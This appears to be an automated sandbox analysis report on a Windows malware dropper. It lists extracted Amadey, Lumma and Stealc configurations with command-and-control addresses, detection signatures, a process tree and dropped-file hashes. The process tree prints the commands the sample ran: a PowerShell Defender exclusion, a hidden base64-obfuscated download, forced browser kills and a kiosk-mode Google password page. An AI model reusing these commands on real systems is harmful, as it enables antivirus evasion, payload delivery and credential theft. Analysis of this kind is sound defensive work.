Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    09-12-2024 07:06

General

  • Target

    file.exe

  • Size

    3.1MB

  • MD5

    22bf111e0ffbce40da98521c8ac390ac

  • SHA1

    86c47f8fc939e81d7ceba37f1824e22ce4ef1f43

  • SHA256

    0536c8987bbf4c736ee1ffaba0cb1e52d1652574fcb80ab14ff7d23a40e446b2

  • SHA512

    a9d529513d988c20380432d0ce1f10b6286a949442f6964ba455d14f51d308810b495d6e04ec375c9a990230f04a1444e7a9647c205a38275aae08b34408d30e

  • SSDEEP

    98304:pLPTyc5Jt2SKP64GsNe+WPvvFmuY6/JsYk:xTyc7me+W3v9Y6

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 16 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:824
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Users\Admin\AppData\Local\Temp\1013334001\vdGy6gA.exe
        "C:\Users\Admin\AppData\Local\Temp\1013334001\vdGy6gA.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:772
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 772 -s 44
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:856
      • C:\Users\Admin\AppData\Local\Temp\1013367001\4ZAAIhb.exe
        "C:\Users\Admin\AppData\Local\Temp\1013367001\4ZAAIhb.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1028
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\982.tmp\983.tmp\984.bat C:\Users\Admin\AppData\Local\Temp\1013367001\4ZAAIhb.exe"
          4⤵
          • Drops startup file
          • Suspicious use of WriteProcessMemory
          PID:2920
          • C:\Windows\system32\net.exe
            net session
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1848
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 session
              6⤵
                PID:1928
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1268
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_file.bin'"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1652
            • C:\Windows\system32\timeout.exe
              timeout /t 10 /nobreak
              5⤵
              • Delays execution with timeout.exe
              PID:2548
            • C:\Windows\system32\timeout.exe
              timeout /t 10 /nobreak
              5⤵
              • Delays execution with timeout.exe
              PID:884
            • C:\Windows\system32\timeout.exe
              timeout /t 10 /nobreak
              5⤵
              • Delays execution with timeout.exe
              PID:3220
            • C:\Windows\system32\timeout.exe
              timeout /t 10 /nobreak
              5⤵
              • Delays execution with timeout.exe
              PID:3556
            • C:\Windows\system32\timeout.exe
              timeout /t 10 /nobreak
              5⤵
              • Delays execution with timeout.exe
              PID:3628
        • C:\Users\Admin\AppData\Local\Temp\1013368001\dd6dc85460.exe
          "C:\Users\Admin\AppData\Local\Temp\1013368001\dd6dc85460.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2232
        • C:\Users\Admin\AppData\Local\Temp\1013369001\c1b31261fd.exe
          "C:\Users\Admin\AppData\Local\Temp\1013369001\c1b31261fd.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:584
        • C:\Users\Admin\AppData\Local\Temp\1013370001\c55bf3d9a6.exe
          "C:\Users\Admin\AppData\Local\Temp\1013370001\c55bf3d9a6.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2776
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM firefox.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1200
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM chrome.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2680
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM msedge.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2788
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM opera.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2160
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM brave.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2736
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
            4⤵
              PID:2188
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                5⤵
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1932
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1932.0.2017042975\2028096220" -parentBuildID 20221007134813 -prefsHandle 1268 -prefMapHandle 1260 -prefsLen 20769 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {033fef99-4983-43e2-ab28-fd6cb750caea} 1932 "\\.\pipe\gecko-crash-server-pipe.1932" 1332 100ede58 gpu
                  6⤵
                    PID:1996
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1932.1.933822873\1625742417" -parentBuildID 20221007134813 -prefsHandle 1532 -prefMapHandle 1528 -prefsLen 21630 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f84c3f9-0b9b-4bc9-9bde-75098a3f872f} 1932 "\\.\pipe\gecko-crash-server-pipe.1932" 1544 43edc58 socket
                    6⤵
                      PID:1348
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1932.2.1188372569\24472276" -childID 1 -isForBrowser -prefsHandle 1988 -prefMapHandle 1984 -prefsLen 21668 -prefMapSize 233414 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63befb2b-ef3b-44d0-ab32-b6d4a3f96f52} 1932 "\\.\pipe\gecko-crash-server-pipe.1932" 2000 19992a58 tab
                      6⤵
                        PID:300
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1932.3.1897127120\503744015" -childID 2 -isForBrowser -prefsHandle 2828 -prefMapHandle 2824 -prefsLen 26138 -prefMapSize 233414 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f97f3e8a-96c7-4540-9bcf-563971602285} 1932 "\\.\pipe\gecko-crash-server-pipe.1932" 2840 1cec0b58 tab
                        6⤵
                          PID:584
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1932.4.1694116953\1664874569" -childID 3 -isForBrowser -prefsHandle 3724 -prefMapHandle 3948 -prefsLen 26197 -prefMapSize 233414 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {871bb4ed-ff68-41e1-8980-6b10238390c7} 1932 "\\.\pipe\gecko-crash-server-pipe.1932" 3976 1f3d6258 tab
                          6⤵
                            PID:2548
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1932.5.652818955\1840110842" -childID 4 -isForBrowser -prefsHandle 4060 -prefMapHandle 4064 -prefsLen 26197 -prefMapSize 233414 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5748a158-188f-4920-8d7d-961f4aa08894} 1932 "\\.\pipe\gecko-crash-server-pipe.1932" 3904 1f3d8958 tab
                            6⤵
                              PID:2680
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1932.6.136424276\407561223" -childID 5 -isForBrowser -prefsHandle 4228 -prefMapHandle 4232 -prefsLen 26197 -prefMapSize 233414 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f23c70b-bac9-4d38-8964-1a298c9d1783} 1932 "\\.\pipe\gecko-crash-server-pipe.1932" 4220 20c83858 tab
                              6⤵
                                PID:2788
                        • C:\Users\Admin\AppData\Local\Temp\1013371001\2efeb03c93.exe
                          "C:\Users\Admin\AppData\Local\Temp\1013371001\2efeb03c93.exe"
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:408

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\activity-stream.discovery_stream.json.tmp

                      Filesize

                      31KB

                      MD5

                      73c88b5aa52a029b80e74b3c67965992

                      SHA1

                      95499816d69c2d26434d4bce5660e52a9b28d124

                      SHA256

                      7b2d6769a8fac3f1d99baabfba7fd565ea0e40a1e7666249eb437b52d641dbcf

                      SHA512

                      9237d9ae268d72a96b62a475f53152ac95cd89a590f51e6de9761f081ba6df82bd8ec3c0a435cbeaec97a78f19d767d3cc394c2485a8b25e2c5073e223b2103e

                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                      Filesize

                      15KB

                      MD5

                      96c542dec016d9ec1ecc4dddfcbaac66

                      SHA1

                      6199f7648bb744efa58acf7b96fee85d938389e4

                      SHA256

                      7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                      SHA512

                      cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                    • C:\Users\Admin\AppData\Local\Temp\1013334001\vdGy6gA.exe

                      Filesize

                      2.5MB

                      MD5

                      2a78ce9f3872f5e591d643459cabe476

                      SHA1

                      9ac947dfc71a868bc9c2eb2bd78dfb433067682e

                      SHA256

                      21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae

                      SHA512

                      03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

                    • C:\Users\Admin\AppData\Local\Temp\1013367001\4ZAAIhb.exe

                      Filesize

                      121KB

                      MD5

                      a3d68745e8919e2a48d8fa0738da124e

                      SHA1

                      85ea6ab1d2d3f6af2011b130756d57f31539e171

                      SHA256

                      65bc085f99db63b0581b2153a0aa2d7151133aafeeb2810f56a5d17ef9760d46

                      SHA512

                      99575b08e17dd409e2cede4996bfc812ebe430a811f96b5c08e3093be8149e2aa148c4d7b71f1c24b5d2be592567494ea0118e355839fc83ab3603a34098a5ac

                    • C:\Users\Admin\AppData\Local\Temp\1013368001\dd6dc85460.exe

                      Filesize

                      1.8MB

                      MD5

                      f15a88b85afa75fb85fb70e83071e286

                      SHA1

                      f34100ebca880311df1082b72a01d380948c75ff

                      SHA256

                      b3e4be8c35c51703b96863766cef23d57c03a80425d9b3942ef99cd8f54a5950

                      SHA512

                      daff513539b56b38e47a6de1d1ad36d3510b96ed4121282fc6797533ce9de94c145e9bcce44fbb3cc123f3c1595299e3e0ab4c42913004d0153c4ec499669b51

                    • C:\Users\Admin\AppData\Local\Temp\1013369001\c1b31261fd.exe

                      Filesize

                      1.7MB

                      MD5

                      1ccd476ef1cb8a55170a6ef196dfb053

                      SHA1

                      5bf1b3781099129a92a2925576c1628f65ac9e19

                      SHA256

                      9b25c62d773c36fe7bb6c02204f61b1ca0fd6c4d1a9f1245dd917e3439d01588

                      SHA512

                      9ffa61cf282f77a01855237bab9bbcb7bddb24383d643c7d89a58bda6f34b18f628ee743e1782aee3685d5bdf410472a857b035ceaa350d153154e1b50234513

                    • C:\Users\Admin\AppData\Local\Temp\1013370001\c55bf3d9a6.exe

                      Filesize

                      948KB

                      MD5

                      03c3b35f938a1bc015e2579a7fb58015

                      SHA1

                      3fdfb37c9eab06c72cf651157b9cfb6182fa468e

                      SHA256

                      130610fd4154cd5b5e146ad854fb21e0f694c35161be73d634b5aea9850e3e8b

                      SHA512

                      0c387b9f791286b427a12b0a4e43a7043065f3a6e40b0fe92ab80b3a52be8d0b2b71b5aa39bdc04c26e9b4f71e0cc337fd78ccbda4a3610d740421281f4e3553

                    • C:\Users\Admin\AppData\Local\Temp\1013371001\2efeb03c93.exe

                      Filesize

                      2.6MB

                      MD5

                      a45a51347a496e17a3427a34e1b27447

                      SHA1

                      96a78501643cddc6085be113bcc1da7e3d6f8f51

                      SHA256

                      ab9ae453090cee1da838f1e17be5ecb435987168b10a649da876a6df6d27dc27

                      SHA512

                      e9c2ad3fbf06c23088a055c19cf449221c2dcfd0584648d01a86976400be4b590cf183065c9dac1166ad1f78d915d98913926dd1be1e01a1937ee458922365db

                    • C:\Users\Admin\AppData\Local\Temp\982.tmp\983.tmp\984.bat

                      Filesize

                      1KB

                      MD5

                      77ce738d9b82e6ebfcfa3f1081f037fc

                      SHA1

                      c4db7196464f86b05ac3532d99175d2eb09ca7dd

                      SHA256

                      24fefbb2301ebd0814fbee1edb6b28dafc871da247defa69bfa3fb999ac8d7c1

                      SHA512

                      52afe5faa53deb5d555a7a9fc0f5b8f57503f837bcc8b54e2b7d6819952644b8a6a077c77ef3fbf2af84ae78b086ab547af393f9290c1ec69929687d8837d70e

                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                      Filesize

                      442KB

                      MD5

                      85430baed3398695717b0263807cf97c

                      SHA1

                      fffbee923cea216f50fce5d54219a188a5100f41

                      SHA256

                      a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                      SHA512

                      06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                      Filesize

                      8.0MB

                      MD5

                      a01c5ecd6108350ae23d2cddf0e77c17

                      SHA1

                      c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                      SHA256

                      345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                      SHA512

                      b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                      Filesize

                      7KB

                      MD5

                      ebff56ebd8dbf4f7192e79fc80dfe855

                      SHA1

                      fc8aeb60c4874ea22088f6f29a9e35ac6ab231ea

                      SHA256

                      defeff89095f16bc3ee57715c79d5345bafaab3a25cf6b718d69d4165da25ff5

                      SHA512

                      d7976fdd53ed65266e56341061a73a8a003a54fe4f7f596eb623485c7c44a7c841de4ad378b742e75d6d6d2f4eb3dea4dcf8826bfa7c4fc129cbc2f09649e41a

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\datareporting\glean\db\data.safe.bin

                      Filesize

                      2KB

                      MD5

                      ea03ed3fba7e7ef81a5252b85d544572

                      SHA1

                      97abb9617103d9538808baf04fb6c74cb0519c3a

                      SHA256

                      3ef79f02b049d236fcedf4300ac9b0e352e4f2a6f0bca705e4297606cdf62246

                      SHA512

                      99ea45296033483cfcd8e9d7a5a4643b655ac4202281d9f734fc16d0fa0f851769d87ee91dadc7ac6ee1ce08df02a7c5cca58bdffa51e6e261420bf0b6975e57

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\datareporting\glean\pending_pings\3f429cf0-ceb3-490a-91b8-ef8c336c5c12

                      Filesize

                      11KB

                      MD5

                      abce85e91aecfcac3dad9a82dcee9108

                      SHA1

                      964820b165e005e0068014123dfb6f9f1bd43563

                      SHA256

                      551b7140f490f258164d93e243bf5023d6e741b0c2fd84904d8eff9adf5dc82e

                      SHA512

                      be6677a940ba00a637ec5e7eefb176bb8926f3cf5289ccf85651c08d1d020da7eacb64c0b98f8195529568e2da8ecd4dba2263ef44fec65e252e1c917534474b

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\datareporting\glean\pending_pings\46d9e465-c6cf-44e7-94ce-be16726f78d7

                      Filesize

                      745B

                      MD5

                      b3443fa4d3808dba4ece21ecab6285e4

                      SHA1

                      eaf63f4272e11f4822135723b9d6c902f57f414a

                      SHA256

                      c6f6c5e6bda348c88370d34cf191a79166b5a4cb332405acdd83445a523822a5

                      SHA512

                      540ee0a5de0d0d941e135bf9d7c877dcb3618cc14f5df5ec318d7e33c08ad1fa889ee4952861f5ab0415a7cbd4a9a0363dc894d92e1c4eded176599e67180a81

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                      Filesize

                      997KB

                      MD5

                      fe3355639648c417e8307c6d051e3e37

                      SHA1

                      f54602d4b4778da21bc97c7238fc66aa68c8ee34

                      SHA256

                      1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                      SHA512

                      8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                      Filesize

                      116B

                      MD5

                      3d33cdc0b3d281e67dd52e14435dd04f

                      SHA1

                      4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                      SHA256

                      f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                      SHA512

                      a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                      Filesize

                      479B

                      MD5

                      49ddb419d96dceb9069018535fb2e2fc

                      SHA1

                      62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                      SHA256

                      2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                      SHA512

                      48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

                      Filesize

                      372B

                      MD5

                      8be33af717bb1b67fbd61c3f4b807e9e

                      SHA1

                      7cf17656d174d951957ff36810e874a134dd49e0

                      SHA256

                      e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

                      SHA512

                      6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

                      Filesize

                      11.8MB

                      MD5

                      33bf7b0439480effb9fb212efce87b13

                      SHA1

                      cee50f2745edc6dc291887b6075ca64d716f495a

                      SHA256

                      8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                      SHA512

                      d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                      Filesize

                      1KB

                      MD5

                      688bed3676d2104e7f17ae1cd2c59404

                      SHA1

                      952b2cdf783ac72fcb98338723e9afd38d47ad8e

                      SHA256

                      33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                      SHA512

                      7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

                      Filesize

                      1KB

                      MD5

                      937326fead5fd401f6cca9118bd9ade9

                      SHA1

                      4526a57d4ae14ed29b37632c72aef3c408189d91

                      SHA256

                      68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

                      SHA512

                      b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\prefs-1.js

                      Filesize

                      6KB

                      MD5

                      feae3ad8b3c27c51efd879a5336536fa

                      SHA1

                      cc9bb689007b74fa258b6ea08f04f2ad0e1d2e39

                      SHA256

                      204fb12f409c76d207030bcebb898e6c1416f5e25220b4c24112e36209693ba6

                      SHA512

                      6c0185fcfff48c6ec3cc71bacad6255077a5510a2d65ca1f901e138dc26e7f8e350d26b8a879d30d2c23a33f7155a34625f5ffec844bc8ee00dff70123bdc709

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\prefs-1.js

                      Filesize

                      7KB

                      MD5

                      4a3a957bb6575428ee46cd8164b86e47

                      SHA1

                      692a5492e35522328ce0d312d1952ebcdc93a542

                      SHA256

                      85c388d0f125b7dffa3e4dd55a763c3055c1a66cbb343192287f2c4365d7f944

                      SHA512

                      e8f4e59f50e463a48ed56eb217964370e0e7cd92b4464323ca26fec488f62dbb23a1c72ba1fbe4c1709948f90d61fdc2234ca330195b6e71391722b91a8cef59

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\prefs-1.js

                      Filesize

                      6KB

                      MD5

                      1162d6aa5297076dc1f46792ea02231b

                      SHA1

                      0bfa2f2778e0181ac00b848501e3d445abb1f60a

                      SHA256

                      e5e6664f6df5f87e91b670b647f51af85bb1d42430ecb6c7574d31bcaa9f105b

                      SHA512

                      10d3ca82c866fc22ad74000b5e1bd4e4d00838bd5b3b3aaf806a73c8245eb7fd4df8f51d4b311dd5bf5f065250262e17037cefa359abe53fc1f248d845980c32

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\prefs.js

                      Filesize

                      6KB

                      MD5

                      86f407005fbf8ddd033fceaf60ed372f

                      SHA1

                      0f4c3d920aba3311316aa23969e96a0fd65af2a2

                      SHA256

                      778ebb56194b5ba2f52bbdb8b887267cffbd4d8b2d05a84339b813b5387af07e

                      SHA512

